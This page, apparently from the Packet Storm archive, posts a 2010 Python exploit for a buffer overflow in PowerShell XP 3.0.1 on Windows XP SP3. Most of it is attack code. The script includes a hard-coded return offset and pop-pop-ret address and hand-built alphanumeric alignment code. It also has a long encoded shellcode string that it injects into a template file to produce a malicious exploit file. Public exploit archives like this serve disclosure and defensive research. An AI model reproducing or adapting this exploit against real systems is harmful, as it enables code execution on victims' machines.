exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PowerShell XP 3.0.1 Buffer Overflow

PowerShell XP 3.0.1 Buffer Overflow
Posted Dec 11, 2010
Authored by m_101

PowerShell XP version 3.0.1 buffer overflow exploit.

tags | exploit, overflow
SHA-256 | 446a585e1ae00a3128deb6fbcfbf923285a37b0964c09c0fb89942ac45f96c79

PowerShell XP 3.0.1 Buffer Overflow

Change Mirror Download
#!/usr/bin/python

# vuln finders : kmkz, zadyree, hellpast
# author : m_101
# site : http://binholic.blogspot.com/
# Exploit Title: PowerShell XP 3.0.1 0day
# Date: 11/12/2010
# Author: m_101
# Software Link: http://www.softpedia.com/progDownload/PowerShell-XP-Download-22529.html
# Version: 3.0.1
# Tested on: Windows XP SP3 English

import sys

if len(sys.argv) < 4:
print("Usage: %s input output payload" % sys.argv[0])
print("Payload must be encoded with alpha2 and EAX based
exit(1)

# get file content
infile = sys.argv[1]
fp = open(infile, 'r')
content = fp.read()
fp.close()

#
fpayload = sys.argv[3]
fp = open(fpayload, 'r')
payload = fp.read()
fp.close()

# first offset ... but not enough room
# ret_offset = 248
ret_offset = 5268

# pop pop ret
ret = "\x9e\x13\x40\x00"

ecx = "\x45\x61\x39\x76"
eax = "\x47\x61\x39\x76"

print("Constructing alignment code")
# alignment code
# dec esp
# dec esp
# dec esp
# dec esp
align = 'L' * 4
# push esp ; save current esp register
align += 'T'
# pop edx ; save in edx
align += 'Z'
# pop esp (make esp point to data)
align += '\\'
# push edx ; old esp register
align += 'R' # edi
# popad
align += 'a'

# align += ecx
# align += eax

# we get actual value (for later restore ;))
# pop ecx
# push ecx
align += "\x59\x51"
# push esp
# pop eax ; here the code is adjusted but we still need to restore old stack
align += 'TX'
# we repatch the stack (or we may have bad memory access ;))
# push ecx
align += "\x51"
# we don't want our current instructions to be crushed
# dec esp * 4
align += 'L' * 8
# push edi ; old stack
align += 'W'
# pop esp ; restore old stack
align += '\\'
# junk bytes
align += 'K' * 4 # scrape space (esp point here)

# buffer need to be long enough ;)
print("Padding")

print("Constructing payload")
msg = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIhkS62xKYc5wpC0uP9xZUKOkOyonahlwP5PEPuPK9kUOySuc8kXf6Gp5Ps0Phnn0NdNzLPPm81yS05Ps0NiQUuPLKsmEXmQO38WePEP5PPSYoPUuPsXMxOR2mMlPPKXrnePgpwpOyG5Vd0h5P7p5PuPLKCm38mQksJB5PC05PpSLKSmS8NaiSJMgpgpwpQCSXwpuPS0GpKOpUTDlKBedHmks9uRWp5PvazxioKP01O0PdUS3ptp1hvlLKQPTLnkRPglnMNkcpS8XkUYNk1PttnmCpsLnksp7LySQpnkbLddQ4lKPE5lLKrtuUrX5Q8jLK3zTXNkQJ5peQXkysvWSyNkP4LKuQXnTq9otqyPKLNLMTKp444JyQXOTMWqKwyyIaKOKOKOwKcL145x45YNLK3jTdeQ8kCVNkflbkNk0ZULs18klKuTLKgqKXLIW4VDglE1hBUXWpt5cC1uBRUcGBfN2DPl0lWpaXpa2C2K3UpdTaup7JUyuPPPu1RWPnQuPdupsRaiUpBMcotqtpvQWpA"
payload = msg + payload
print("Payload size : %u" % len(payload))
# let's have the minimum correct buffer length!
padding = (ret_offset - len(payload) - len(align)) * 'C'

print("Constructing egg")
egg = align + payload + padding + ret
print("Egg size : %u" % len(egg))

modified = content.replace('TESTTEST', egg)

# working
outfile = sys.argv[2]
print ("Writing exploit file : %s" % outfile)
fp = open(outfile, 'w')
fp.write(modified)
fp.close()


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close